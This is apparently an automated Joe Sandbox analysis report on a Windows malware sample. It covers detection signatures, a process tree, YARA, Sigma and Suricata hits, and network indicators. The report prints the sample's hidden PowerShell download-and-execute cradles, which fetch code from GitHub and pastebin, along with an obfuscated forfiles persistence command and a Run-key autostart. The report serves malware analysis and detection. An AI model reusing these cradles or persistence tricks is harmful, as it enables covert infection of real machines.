Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xK44OOt7vD.exe

Overview

General Information

Sample name:xK44OOt7vD.exe
renamed because original name is a hash value
Original sample name:1e4a2d67df3b0a1f2d1f5d3af6587f9f222adf40c0a9d4976fc78a21d9efa5b5.exe
Analysis ID:1534110
MD5:5e40e28eed9c4ede7b34b64b6c58571c
SHA1:61aef6b48e463a70a8bb414c43b497e0b4759f04
SHA256:1e4a2d67df3b0a1f2d1f5d3af6587f9f222adf40c0a9d4976fc78a21d9efa5b5
Tags:exeNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to inject threads in other processes
Powershell creates an autostart link
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xK44OOt7vD.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\xK44OOt7vD.exe" MD5: 5E40E28EED9C4EDE7B34B64B6C58571C)
    • powershell.exe (PID: 7428 cmdline: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 7632 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7652 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8530.tmp" "c:\Users\user\AppData\Local\Temp\rlfwipso\CSC770B74A1B374466B59916F033873949.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • Stand_Trainer_Updated.exe (PID: 7688 cmdline: "C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe" MD5: BECD67D75C5E7C2411E9F481086CA1E0)
      • attrib.exe (PID: 8020 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • svchost.exe (PID: 7728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • forfiles.exe (PID: 8060 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8140 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 3136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 5660 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7232 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3136INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x26f3:$b1: ::WriteAllBytes(
  • 0x2d041:$b1: ::WriteAllBytes(
  • 0x45133:$s1: -join
  • 0x45893:$s1: -join
  • 0x13214b:$s1: -join
  • 0x14b825:$s1: -join
  • 0x57c24:$s3: reverse
  • 0x57f12:$s3: reverse
  • 0x5862c:$s3: reverse
  • 0x58de5:$s3: reverse
  • 0x5fffd:$s3: reverse
  • 0x60417:$s3: reverse
  • 0x60f9f:$s3: reverse
  • 0x61c4c:$s3: reverse
  • 0xa2038:$s3: reverse
  • 0xad95e:$s3: reverse
  • 0xeff15:$s3: reverse
  • 0xf9d24:$s3: reverse
  • 0x10708d:$s3: reverse
  • 0x10dcc1:$s3: reverse
  • 0x10fd79:$s3: reverse
Process Memory Space: powershell.exe PID: 7296INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xddfcc:$b1: ::WriteAllBytes(
  • 0x12fec8:$s1: -join
  • 0x13066f:$s1: -join
  • 0x1532e8:$s1: -join
  • 0x163acc:$s1: -join
  • 0xcab7:$s3: reverse
  • 0x18413:$s3: reverse
  • 0x44a78:$s3: reverse
  • 0x44d66:$s3: reverse
  • 0x45480:$s3: reverse
  • 0x45c39:$s3: reverse
  • 0x4ce3b:$s3: reverse
  • 0x4d255:$s3: reverse
  • 0x4dddd:$s3: reverse
  • 0x4ea8a:$s3: reverse
  • 0x77e58:$s3: reverse
  • 0x7adc5:$s3: reverse
  • 0x82c67:$s3: reverse
  • 0x8b948:$s3: reverse
  • 0xc5af1:$s3: reverse
  • 0xce0fd:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_3136.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_7296.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", CommandLine: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xK44OOt7vD.exe", ParentImage: C:\Users\user\Desktop\xK44OOt7vD.exe, ParentProcessId: 7324, ParentProcessName: xK44OOt7vD.exe, ProcessCommandLine: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", ProcessId: 7428, ProcessName: powershell.exe
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 8060, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 8140, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7428, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline", ProcessId: 7632, ProcessName: csc.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", CommandLine: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xK44OOt7vD.exe", ParentImage: C:\Users\user\Desktop\xK44OOt7vD.exe, ParentProcessId: 7324, ParentProcessName: xK44OOt7vD.exe, ProcessCommandLine: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", ProcessId: 7428, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", CommandLine: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xK44OOt7vD.exe", ParentImage: C:\Users\user\Desktop\xK44OOt7vD.exe, ParentProcessId: 7324, ParentProcessName: xK44OOt7vD.exe, ProcessCommandLine: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", ProcessId: 7428, ProcessName: powershell.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7428, TargetFilename: C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", CommandLine: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xK44OOt7vD.exe", ParentImage: C:\Users\user\Desktop\xK44OOt7vD.exe, ParentProcessId: 7324, ParentProcessName: xK44OOt7vD.exe, ProcessCommandLine: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", ProcessId: 7428, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7728, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7428, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline", ProcessId: 7632, ProcessName: csc.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:00:07.194122+020028032742Potentially Bad Traffic192.168.2.549769185.199.110.133443TCP
2024-10-15T16:00:08.400543+020028032742Potentially Bad Traffic192.168.2.549774185.199.110.133443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:00:40.331436+020028576591A Network Trojan was detected192.168.2.549952162.159.138.232443TCP
2024-10-15T16:00:47.351688+020028576591A Network Trojan was detected192.168.2.549990162.159.138.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:00:23.523479+020028576581A Network Trojan was detected192.168.2.549860162.159.138.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: xK44OOt7vD.exeReversingLabs: Detection: 39%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49860 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49870 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49881 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49910 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49921 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49952 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49990 version: TLS 1.2
Source: xK44OOt7vD.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb' source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000D.00000002.2703961662.00000205B6810000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb4e089 source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb~ source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089x_e source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbQv source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb" source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll"( source: powershell.exe, 00000012.00000002.2763903950.00000127619CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbmey source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbD source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll source: powershell.exe, 0000000D.00000002.2703961662.00000205B6810000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb^v source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6A92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2703961662.00000205B6770000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764383354.0000012761A14000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Programming1\Cpscommand\x64\Release\Cpscommand.pdb source: xK44OOt7vD.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6A92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbGv source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbows\ source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb; source: powershell.exe, 0000000D.00000002.2705160657.00000205B6A92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2794282634.0000012779D15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb) source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA028C54 FindFirstFileExW,0_2_00007FF7EA028C54

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.5:49860 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.5:49990 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.5:49952 -> 162.159.138.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
